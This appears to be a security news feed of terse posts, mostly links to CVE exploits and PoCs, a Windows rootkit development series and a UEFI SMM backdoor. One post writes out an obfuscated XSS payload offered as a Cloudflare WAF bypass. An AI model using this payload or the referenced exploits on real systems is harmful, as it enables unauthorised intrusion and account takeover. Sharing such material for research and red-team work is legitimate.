CVE-2023-2163
Linux Kernel: eBPF verifier bug
POC

Спасибо Julien Mousqueton за отличную подборку, сам то понял какой инструмент создал ? )))
https://ransomware.live/#/status

or winamp 😜
#humor

Windows rootkit development for red teaming
*
Part 1 | Introduction
Part 2 | A tale of routines, IOCTLs and IRPs
Part 3 | Sailing to the land of the user (and debugging the ship)
Part 4 | The call back home
Part 5 | Saruman's Manipulation


*
#malware #windows #rootkit

Cloudflare bypass WAF
*
Payload:
<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;

#cloudflare #bypass #waf #xss

CVE-2023-34051
VMware Aria Operations for Logs
*
Technical Deep
*
Exploit


#vmware #bypass #exploit

Каждый раз смешно )))
И мало того, оно даже документировано - Windows Internals part 2

#remoteRegistry #135

So cool ! ))))
link

#Назад_в_будущее

CVE-2023-36745
MS Exchange Server Privilege Escalation
exploit

#exchange

v2rayNG
Xray core and v2fly core
client for Android

#greypath

RCE on ingress-nginx-controller via Ingress spec.rules.http.paths.path field
*
Reported June 30, 2022
Disclosed October 26, 2023
link

#nginx #k8s

Собака старая, трюки новые.
System Management Mode backdoor for UEFI based platforms
*
SmmBackdoorNg

#backdoor #uefi #smm

XAMPP v-3.3.0 Buffer Overflow (Unicode + SEH)
POC

#web #xamp

book of secret knowledge
Судя по объему, кто то оцифровал утерянную Александрийскую библиотеку
link

Cisco IOS XE
CVE-2023-20198
POC creates a user named baduser with privilege level 15